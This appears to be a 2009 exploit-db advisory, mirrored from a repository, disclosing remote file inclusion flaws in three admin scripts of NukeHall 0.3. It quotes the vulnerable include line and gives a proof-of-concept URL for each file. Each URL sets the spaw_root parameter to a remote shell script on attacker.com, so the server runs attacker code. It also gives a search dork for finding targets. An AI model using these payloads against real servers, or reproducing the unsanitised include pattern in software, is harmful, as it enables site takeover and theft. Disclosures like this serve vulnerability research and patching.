exploit-db-mirror/exploits/php/webapps/10217.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

42 lines
No EOL
1.6 KiB
Text

[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#NukeHall <= 0.3 Multiple Remote File Include Vulnerability
#Download Script : http://sourceforge.net/project/NukeHall/files/
#Dork : die("Hacking attempt"); :D
########################################################################
#
#Vuln : ./nukehall_0.3/admin/modules/blocks.php (line 28)
# <?php
# include $spaw_root.'spaw_control.class.php';
# ?>
#PoC : http://server/[path]/admin/modules/blocks.php?spaw_root=http://attacker.com/shell.txt?cmd
#
#
#Vuln : ./nukehall_0.3/admin/modules/messages.php (line 28)
# <?php
# include $spaw_root.'spaw_control.class.php';
# ?>
#PoC : http://server/[path]/admin/modules/messages.php?spaw_root=http://attacker.com/shell.txt?cmd
#
#
#Vuln : ./nukehall_0.3/admin/modules/stories.php (line 28)
# <?php
# include $spaw_root.'spaw_control.class.php';
# ?>
#PoC : http://server/[path]/admin/modules/stories.php?spaw_root=http://attacker.com/shell.txt?cmd
#
#
#
#
########################################################################
#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
# dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################
/##############################################\
# all member at manadocoding.net #
# all member at sekuritionline.net #
\##############################################/
[ Gorontalo / 2009 ]